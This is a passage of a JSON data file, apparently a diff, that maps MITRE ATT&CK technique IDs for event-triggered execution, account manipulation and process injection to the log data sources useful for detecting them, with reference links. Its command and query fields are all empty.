"https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1546.009", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "wmi", + "definition": "Information about objects from system classes (such as providers, filters, and consumers) that support Windows Management Instrumentation (WMI) activitites.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "wmi creation", + "description": "A WMI object (filter, consumer, subscription, binding, provider) was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "wmi object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1098.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1098.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "user" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1055.013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.011", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.014", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + 